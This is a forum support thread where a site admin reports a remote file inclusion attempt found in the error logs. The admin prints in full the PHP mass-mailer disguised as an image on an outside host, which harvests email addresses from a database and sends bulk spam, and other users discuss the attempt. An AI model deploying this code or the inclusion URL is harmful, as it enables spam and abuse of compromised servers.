TinyPortal

Hi folks,

while parsing the errormessages of my forum i found the following :


Filter hinzufügen: Zeige nur Fehlermeldungen dieses Benutzers  Gast    Gestern um 01:33:13
Filter hinzufügen: Zeige nur Fehlermeldungen dieser IP-Adresse 81.199.58.39   
Filter hinzufügen: Zeige nur Fehlermeldungen dieser URL http://www.rad-community.de/ds1test/index.php?page=http://ibank.glwb.info/mayer.jpg?
Filter hinzufügen: Zeige nur Fehlermeldungen mit der gleichen Nachricht
Datenbankfehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://ibank.glwb.info/mayer.jpg? AND off=0 AND approved=1 LIMIT 1' at line 1
Datei: /var/www/rad-community/htdocs/ds1test/Sources/TPortal.php
Zeile: 368


i was wondering what the guest want to do so i checked the link and found the following code hidden in the mayer.jpg


<?


If ($action=="mysql"){

    #Grab email addresses de MySQL

    include "./mysql.info.php";

    if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){

    print "Porfavor configure su mysql.info.php en tu MySQL informacion. Todas las opciones requeridas.";

    exit;

    }

    $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Conexion en MySQL Fallida.");

    mysql_select_db($sqldb, $db) or die("Seleecione su DataBase $sqldb");

    $result = mysql_query($sqlquery) or die("Secion fallida: $sqlquery");

    $numrows = mysql_num_rows($result);

   

    for($x=0; $x<$numrows; $x++){

    $result_row = mysql_fetch_row($result);

    $oneemail = $result_row[0];

    $emaillist .= $oneemail."\n";

    }

    }



if ($action=="send"){

    $message = urlencode($message);

    $message = ereg_replace("%5C%22", "%22", $message);

    $message = urldecode($message);
    $message = stripslashes($message);
    $subject = stripslashes($subject);

}



?>

<form name="form1" method="post" action="" enctype="multipart/form-data">

  <br>

  <table width="100%" border="0">

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

          Mail:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="from" value="<? print $from; ?>" size="30">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

          Name:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="realname" value="<? print $realname; ?>" size="30">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Repit:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="replyto" value="<? print $replyto; ?>" size="30">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Upload

          Txt:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="file" name="file" size="30">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>

      </td>

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="text" name="subject" value="<? print $subject; ?>" size="90">

        </font></td>

    </tr>

    <tr valign="top">

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>

        <br>

        <input type="radio" name="contenttype" value="plain">

        Plain

        <input type="radio" name="contenttype" value="html" checked>

        HTML

        <input type="hidden" name="action" value="send">

        <input type="submit" value="Send Emails">

        </font></td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>

        </font></td>

    </tr>

  </table>

</form>



<?

if ($action=="send"){



    if (!$from && !$subject && !$message && !$emaillist){

    print "Porfavor complete todo lo necesario.";

    exit;

    }

   

    $allemails = split("\n", $emaillist);

    $numemails = count($allemails);



    #Open the file attachment if any, and base64_encode it for email transport

    If ($file_name){

        @copy($file, "./$file_name") or die("El archivo que intestaste subir al servidor, no puede ser copiado");

        $content = fread(fopen($file,"r"),filesize($file));

        $content = chunk_split(base64_encode($content));

        $uid = strtoupper(md5(uniqid(time())));

        $name = basename($file);

    }

   

    for($x=0; $x<$numemails; $x++){

        $to = $allemails[$x];

        if ($to){

        $to = ereg_replace(" ", "", $to);

        $message = ereg_replace("&email&", $to, $message);

        $subject = ereg_replace("&email&", $to, $subject);

        print "Sending mail to $to.......";

        flush();

        $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

        $header .= "MIME-Version: 1.0\r\n";

        If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";

        If ($file_name) $header .= "--$uid\r\n";

        $header .= "Content-Type: text/$contenttype\r\n";

        $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

        $header .= "$message\r\n";

        If ($file_name) $header .= "--$uid\r\n";

        If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";

        If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";

        If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";

        If ($file_name) $header .= "$content\r\n";

        If ($file_name) $header .= "--$uid--";

        mail($to, $subject, "", $header);

        print "ok<br>";

        flush();

        }

        }



}

?>
<p align="center"><b>Hosted by XGnDX </b></p>


It seems to me that this is a try to get all the email adresses out the sql database to use them as spamadresses.

Does anybody knows this allready or is it completely new ?


PowerPyx

Not knowing php well enough it seems to me that they're trying to use some type of exploit.

If he would have used png, it would have worked.

At least in TP that will not work..the "page" number compare its value to id in the databse. This routine seem to be trying to make something be executed - like the "page" will contains code of some sort for example. But sending excutable code though GET values are very unsafe, so i don't think anyone does that.

Script kiddie?

Anyways, in TP0.9 this will also be better filtered. Any non-number calls will simply not happen, just reported.

Quote from: Xarcell on May 09, 2006, 04:09:30 AM
If he would have used png, it would have worked.

May I ask what you are talking about Xarcell? What does the type of graphic have to do with them trying to inject the SQL server with some code?